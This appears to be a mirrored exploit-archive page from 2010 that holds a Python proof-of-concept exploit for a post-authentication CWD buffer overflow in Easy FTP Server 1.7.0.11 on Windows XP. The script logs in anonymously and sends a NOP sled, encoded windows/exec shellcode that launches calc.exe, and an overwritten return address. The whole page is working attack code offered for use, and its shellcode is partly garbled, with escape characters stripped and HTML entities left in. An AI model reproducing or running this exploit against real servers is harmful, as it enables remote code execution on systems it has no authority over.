Home / os / win7

Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow

Posted on 18 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================================
Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
================================================================================


# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
# Date: 2010-07-18
# Author: fdisk
# Software Link:
# Version: 1.7.0.11
# Tested on: Windows XP SP3 en
# CVE:
 
import socket
import sys
 
buffersize = 268
 
# windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=process, CMD=calc.exe
shellcode = (&quot;xb8xf1x18xc7x71xd9xc7x29xc9xb1x33xd9x74x24xf4&quot;
&quot;x5bx31x43x12x83xebxfcx03xb2x16x25x84xc8xcfx20&quot;
&quot;x67x30x10x53xe1xd5x21x41x95x9ex10x55xddxf2x98&quot;
&quot;x1exb3xe6x2bx52x1cx09x9bxd9x7ax24x1cxecx42xea&quot;
&quot;xdex6ex3fxf0x32x51x7ex3bx47x90x47x21xa8xc0x10&quot;
&quot;x2ex1bxf5x15x72xa0xf4xf9xf9x98x8ex7cx3dx6cx25&quot;
&quot;x7ex6dxddx32xc8x95x55x1cxe9xa4xbax7exd5xefxb7&quot;
&quot;xb5xadxeex11x84x4exc1x5dx4bx71xeex53x95xb5xc8&quot;
&quot;x8bxe0xcdx2bx31xf3x15x56xedx76x88xf0x66x20x68&quot;
&quot;x01xaaxb7xfbx0dx07xb3xa4x11x96x10xdfx2dx13x97&quot;
&quot;x30xa4x67xbcx94xedx3cxddx8dx4bx92xe2xcex33x4b&quot;
&quot;x47x84xd1x98xf1xc7xbfx5fx73x72x86x60x8bx7dxa8&quot;
&quot;x08xbaxf6x27x4ex43xddx0cxa0x09x7cx24x29xd4x14&quot;
&quot;x75x34xe7xc2xb9x41x64xe7x41xb6x74x82x44xf2x32&quot;
&quot;x7ex34x6bxd7x80xebx8cxf2xe2x6ax1fx9excax09xa7&quot;
&quot;x05x13&quot;)
 
eip = &quot;x91xC8x41x7E&quot; # CALL EDI - user32.dll
nopsled = &quot;x90&quot; * 16
 
payload = &quot;x90&quot; * (buffersize-(len(nopsled)+len(shellcode)))
 
def ExploitEasyFTP(target):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((target, 21))
    s.recv(1024)
    s.send('User anonymous
')
    s.recv(1024)
    s.send('PASS anonymous
')
    s.send('CWD '+nopsled+shellcode+payload+eip+'
')
    s.recv(1024)
    s.send('QUIT ftp
')
    s.close()
 
target = sys.argv[1]
 
ExploitEasyFTP(target)


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :